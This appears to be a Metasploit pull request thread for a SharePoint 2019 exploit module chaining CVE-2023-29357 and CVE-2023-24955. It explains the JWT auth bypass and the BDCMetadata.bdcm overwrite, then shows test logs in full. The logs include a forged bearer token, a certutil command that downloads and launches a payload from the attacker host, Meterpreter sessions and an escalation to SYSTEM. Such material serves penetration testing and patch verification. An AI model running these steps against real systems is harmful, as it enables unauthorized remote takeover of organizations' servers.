SharePoint Unauth RCE Exploit Chain (CVE-2023-29357 & CVE-2023-24955)

[jheysel-r7]

This module exploits two vulnerabilities in Sharepoint 2019, an auth bypass CVE-2023-29357 which was patched
in June of 2023 and CVE-2023-24955, an RCE which was patched in May of 2023.

The auth bypass allows attackers to impersonate the Sharepoint Admin user. This vulnerability stems from the
signature validation check used to verify JSON Web Tokens (JWTs) used for OAuth authentication. If the signing
algorithm of the user-provided JWT is set to none, SharePoint skips the signature validation step due to a logic
flaw in the ReadTokenCore() method.

After impersonating the administrator user, the attacker has access to the Sharepoint API and is able to
exploit CVE-2023-24955. This authenticated RCE vulnerability leverages the impersonated privileged account to
replace the "/BusinessDataMetadataCatalog/BDCMetadata.bdcm" file in the webroot directory with a payload. The
payload is then compiled and executed by Sharepoint allowing attackers to remotely execute commands via the API.

Currently the check method exploits the Auth Bypass vulnerability and reports CheckCode::Vulnerable if successful. This means that AutoCheck cannot be set to false as the exploit method uses data gathered while running the check method.

Verification

List the steps needed to make sure this thing works

• Start msfconsole
• Do: use sharepoint_dynamic_proxy_generator_auth_bypass_rce
• Set the RHOST, LHOST, and HOSTNAME options
• Run the module
• Receive a Meterpreter session in the context of the user running the SharePoint application.

[jheysel-r7]

Thanks @jvoisin, I really appreciate the detailed review. My apologies this one was a little more rough around the edges when originally PR'd it. I'm going to put it back in draft for now, there are a couple changes I still need to make.

[bwatters-r7]

I was able to get the installer to work, but it looks likee there are still some issues. Any chance you might now where I went wrong?

msf6 exploit(windows/http/sharepoint_dynamic_proxy_generator_auth_bypass_rce) > show options

Module options (exploit/windows/http/sharepoint_dynamic_proxy_generator_auth_bypass_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     10.5.134.225     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-met
                                         asploit.html
   RPORT      7565             yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The URL of the SharePoint application
   VHOST                       no        HTTP server virtual host


Payload options (cmd/windows/http/x64/meterpreter/reverse_tcp):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   EXITFUNC            process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   FETCH_COMMAND       CERTUTIL         yes       Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL)
   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
   FETCH_FILENAME      MNGXcNHmP        no        Name to use on remote system when storing payload; cannot contain spaces.
   FETCH_SRVHOST                        no        Local IP to use for serving payload
   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
   FETCH_URIPATH                        no        Local URI to use for serving payload
   FETCH_WRITABLE_DIR  %TEMP%           yes       Remote writable dir to store payload; cannot contain spaces.
   LHOST               10.5.135.201     yes       The listen address (an interface may be specified)
   LPORT               4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows Command



View the full module info with the info, or info -d command.

msf6 exploit(windows/http/sharepoint_dynamic_proxy_generator_auth_bypass_rce) > check

[*] Sharepoint version detected: 16.0.0.10337
[*] Discovered hostname is: sp1
[*] getting oauth info
[*] 10.5.134.225:7565 - The target is not exploitable. The server did not return a WWW-Authenticate header containing a realm and client_id

[bwatters-r7]

With httptrace set:

msf6 exploit(windows/http/sharepoint_dynamic_proxy_generator_auth_bypass_rce) > run

[*] Command to run on remote host: certutil -urlcache -f http://10.5.135.201:8080/dOVx5JNISsHZ3V06TolS4w %TEMP%\IwVAbaCZR.exe & start /B %TEMP%\IwVAbaCZR.exe
[*] Fetch Handler listening on 10.5.135.201:8080
[*] HTTP server started
[*] Adding resource /dOVx5JNISsHZ3V06TolS4w
[*] Started reverse TCP handler on 10.5.135.201:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
####################
# Request:
####################
GET / HTTP/1.1
Host: 10.5.134.225:7565
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 14.0; rv:109.0) Gecko/20100101 Firefox/118.0


####################
# Response:
####################
HTTP/1.1 401 Unauthorized
Server: Microsoft-IIS/10.0
SPRequestGuid: 9b7910a1-c3dd-d09e-0000-00afa6a4f7c8
request-id: 9b7910a1-c3dd-d09e-0000-00afa6a4f7c8
X-FRAME-OPTIONS: SAMEORIGIN
SPRequestDuration: 10
SPIisLatency: 0
WWW-Authenticate: NTLM
X-Powered-By: nosniff
MicrosoftSharePointTeamServices: 16.0.0.10337: 1; RequireReadOnly
Date: Thu, 29 Feb 2024 15:12:51 GMT
Content-Length: 0


[*] Sharepoint version detected: 16.0.0.10337
####################
# Request:
####################
GET /_api/web HTTP/1.1
Host: 10.5.134.225:7565
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 14.0; rv:109.0) Gecko/20100101 Firefox/118.0
Authorization: NTLM TlRMTVNTUAABAAAAA7IIAAYABgAkAAAABAAEACAAAABIT1NURE9NQUlO


####################
# Response:
####################
HTTP/1.1 401 Unauthorized
Server: Microsoft-IIS/10.0
WWW-Authenticate: NTLM TlRMTVNTUAACAAAADAAMADgAAAAFgokCY9kstUKAx2kAAAAAAAAAAIYAhgBEAAAACgB8TwAAAA9EAE8ATQBBAEkATgACAAwARABPAE0AQQBJAE4AAQAGAFMAUAAxAAQAGABkAG8AbQBhAGkAbgAuAGwAbwBjAGEAbAADACAAcwBwADEALgBkAG8AbQBhAGkAbgAuAGwAbwBjAGEAbAAFABgAZABvAG0AYQBpAG4ALgBsAG8AYwBhAGwABwAIANIvFsMha9oBAAAAAA==
SPRequestGuid: 9b7910a1-b3df-d09e-0000-0f0ed379181d
request-id: 9b7910a1-b3df-d09e-0000-0f0ed379181d
X-FRAME-OPTIONS: SAMEORIGIN
SPRequestDuration: 4
SPIisLatency: 0
X-Powered-By: nosniff
MicrosoftSharePointTeamServices: 16.0.0.10337: 1; RequireReadOnly
Date: Thu, 29 Feb 2024 15:12:51 GMT
Content-Length: 0


[*] Discovered hostname is: sp1
[*] getting oauth info
####################
# Request:
####################
GET /_api/web HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 14.0; rv:109.0) Gecko/20100101 Firefox/118.0
Authorization: Bearer eyJhbGciOiJIUzI1NiJ9.eyJuYmYiOiIxNjczNDEwMzM0IiwiZXhwIjoiMTY5MzQxMDMzNCJ9.YWFh
HOST: sp1


####################
# Response:
####################
HTTP/1.1 401 Unauthorized
Server: Microsoft-IIS/10.0
SPRequestGuid: 9b7910a1-b3e0-d09e-0000-04f446573254
request-id: 9b7910a1-b3e0-d09e-0000-04f446573254
X-FRAME-OPTIONS: SAMEORIGIN
SPRequestDuration: 1
SPIisLatency: 0
WWW-Authenticate: NTLM
X-Powered-By: nosniff
MicrosoftSharePointTeamServices: 16.0.0.10337: 1; RequireReadOnly
Date: Thu, 29 Feb 2024 15:12:51 GMT
Content-Length: 0


[-] Exploit aborted due to failure: not-vulnerable: The target is not exploitable. The server did not return a WWW-Authenticate header containing a realm and client_id "set ForceExploit true" to override check result.
[*] Exploit completed, but no session was created.

[bwatters-r7]

OK...... I am bad and I should feel bad.
In the above text, you can see that I used port 7565. I assumed this was the default port because it was what came up when I opened the module.
Narrator Voice: It was not the default port.
Apparently, my config file had an rport value for 7565. My only defense is that whatever was listening on that port gave the proper Sharepoint version, but not the proper login challenge, so I assumed it was a problem with the Sharepoint install.
After changing the port to 80, it works great:

msf6 exploit(windows/http/sharepoint_dynamic_proxy_generator_auth_bypass_rce) > set rport 80
rport => 80
msf6 exploit(windows/http/sharepoint_dynamic_proxy_generator_auth_bypass_rce) > set rhost 10.5.132.224
rhost => 10.5.132.224
msf6 exploit(windows/http/sharepoint_dynamic_proxy_generator_auth_bypass_rce) > set verbose true
verbose => true
msf6 exploit(windows/http/sharepoint_dynamic_proxy_generator_auth_bypass_rce) > check

[*] Sharepoint version detected: 16.0.0.10337
[*] Discovered hostname is: sp1
[*] getting oauth info
[*] realm: 1a150b01-299a-48a9-afd4-379402fff4de, client_id: 00000003-0000-0ff1-ce00-000000000000
[*] Got Oauth Info: 1a150b01-299a-48a9-afd4-379402fff4de|00000003-0000-0ff1-ce00-000000000000
[*] Lob id is: XsZNgeM
[*] 10.5.132.224:80 - The target is not exploitable. Failed to get current user
msf6 exploit(windows/http/sharepoint_dynamic_proxy_generator_auth_bypass_rce) > run

[*] Command to run on remote host: certutil -urlcache -f http://10.5.135.201:8080/dOVx5JNISsHZ3V06TolS4w %TEMP%\VJggSlUF.exe & start /B %TEMP%\VJggSlUF.exe
[*] Fetch handler listening on 10.5.135.201:8080
[*] HTTP server started
[*] Adding resource /dOVx5JNISsHZ3V06TolS4w
[*] Started reverse TCP handler on 10.5.135.201:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Sharepoint version detected: 16.0.0.10337
[*] Discovered hostname is: sp1
[*] getting oauth info
[*] realm: 1a150b01-299a-48a9-afd4-379402fff4de, client_id: 00000003-0000-0ff1-ce00-000000000000
[*] Got Oauth Info: 1a150b01-299a-48a9-afd4-379402fff4de|00000003-0000-0ff1-ce00-000000000000
[*] Lob id is: RDGTizI
[*] Successfully impersonated Site Admin: 00000003-0000-0ff1-ce00-000000000000
[+] The target is vulnerable. Authentication was successfully bypassed via CVE-2023-29357 indicating this target is vulnerable to RCE via CVE-2023-24955.
[*] BDCMetadata file already present on the remote host, backing it up.
[+] Stored the original BDCMetadata.bdcm file in loot before overwriting it with the payload: /home/tmoose/.msf4/loot/20240326111419_default_10.5.132.224_sharepoint.confi_734421.txt
[+] Payload has been successfully delivered
[*] Client 10.5.132.224 requested /dOVx5JNISsHZ3V06TolS4w
[*] Sending payload to 10.5.132.224 (Microsoft-CryptoAPI/10.0)
[*] Client 10.5.132.224 requested /dOVx5JNISsHZ3V06TolS4w
[*] Sending payload to 10.5.132.224 (CertUtil URL Agent)
[*] Sending stage (201798 bytes) to 10.5.132.224
[+] BDCMetadata.bdcm has been successfully restored to it's original state.
[*] Meterpreter session 1 opened (10.5.135.201:4444 -> 10.5.132.224:64700) at 2024-03-26 11:14:24 -0500

meterpreter > exit
[*] Shutting down session: 1

[*] 10.5.132.224 - Meterpreter session 1 closed.  Reason: Died

[bwatters-r7]

msf6 exploit(windows/http/sharepoint_dynamic_proxy_generator_auth_bypass_rce) > show options

Module options (exploit/windows/http/sharepoint_dynamic_proxy_generator_auth_bypass_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-met
                                         asploit.html
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The URL of the SharePoint application
   VHOST                       no        HTTP server virtual host


Payload options (cmd/windows/http/x64/meterpreter/reverse_tcp):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   EXITFUNC            process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   FETCH_COMMAND       CERTUTIL         yes       Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL)
   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
   FETCH_FILENAME      nNjcbJIplj       no        Name to use on remote system when storing payload; cannot contain spaces or slash
                                                  es
   FETCH_SRVHOST                        no        Local IP to use for serving payload
   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
   FETCH_URIPATH                        no        Local URI to use for serving payload
   FETCH_WRITABLE_DIR  %TEMP%           yes       Remote writable dir to store payload; cannot contain spaces.
   LHOST                                yes       The listen address (an interface may be specified)
   LPORT               4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows Command



View the full module info with the info, or info -d command.

msf6 exploit(windows/http/sharepoint_dynamic_proxy_generator_auth_bypass_rce) > set rhost 10.5.132.224
rhost => 10.5.132.224
msf6 exploit(windows/http/sharepoint_dynamic_proxy_generator_auth_bypass_rce) > set verbose true
verbose => true
msf6 exploit(windows/http/sharepoint_dynamic_proxy_generator_auth_bypass_rce) > set lhost 10.5.135.201
lhost => 10.5.135.201
msf6 exploit(windows/http/sharepoint_dynamic_proxy_generator_auth_bypass_rce) > run

[*] Command to run on remote host: certutil -urlcache -f http://10.5.135.201:8080/dOVx5JNISsHZ3V06TolS4w %TEMP%\XmTrLPRFwgdq.exe & start /B %TEMP%\XmTrLPRFwgdq.exe
[*] Fetch handler listening on 10.5.135.201:8080
[*] HTTP server started
[*] Adding resource /dOVx5JNISsHZ3V06TolS4w
[*] Started reverse TCP handler on 10.5.135.201:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Sharepoint version detected: 16.0.0.10337
[*] Discovered hostname is: sp1
[*] getting oauth info
[*] realm: 1a150b01-299a-48a9-afd4-379402fff4de, client_id: 00000003-0000-0ff1-ce00-000000000000
[*] Got Oauth Info: 1a150b01-299a-48a9-afd4-379402fff4de|00000003-0000-0ff1-ce00-000000000000
[*] Lob id is: kQCZ
[*] Successfully impersonated Site Admin: 00000003-0000-0ff1-ce00-000000000000
[+] The target is vulnerable. Authentication was successfully bypassed via CVE-2023-29357 indicating this target is vulnerable to RCE via CVE-2023-24955.
[*] BDCMetadata file already present on the remote host, backing it up.
[+] Stored the original BDCMetadata.bdcm file in loot before overwriting it with the payload: /home/tmoose/.msf4/loot/20240326123831_default_10.5.132.224_sharepoint.confi_103678.txt
[+] Payload has been successfully delivered
[*] Client 10.5.132.224 requested /dOVx5JNISsHZ3V06TolS4w
[*] Sending payload to 10.5.132.224 (Microsoft-CryptoAPI/10.0)
[*] Client 10.5.132.224 requested /dOVx5JNISsHZ3V06TolS4w
[*] Sending payload to 10.5.132.224 (CertUtil URL Agent)
[*] Sending stage (201798 bytes) to 10.5.132.224
[+] BDCMetadata.bdcm has been successfully restored to it's original state.
[*] Meterpreter session 1 opened (10.5.135.201:4444 -> 10.5.132.224:57377) at 2024-03-26 12:38:35 -0500

meterpreter > sysinfo
Computer        : SP1
OS              : Windows Server 2022 (10.0 Build 20348).
Architecture    : x64
System Language : en_US
Domain          : DOMAIN
Logged On Users : 19
Meterpreter     : x64/windows
meterpreter > getuid
Server username: DOMAIN\Administrator
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > 

[bwatters-r7]

Release Notes

This PR adds a module that allows unauthenticated remote code execution as Administrator on Sharepoint 2019 hosts. It performs this by exploiting two vulnerabilities in Sharepoint 2019: first, it uses CVE-2023-29357, an auth bypass patched in June of 2023 to impersonate the Administrator user, then it uses CVE-2023-24955, an RCE patched in May of 2023 to execute commands as Administrator.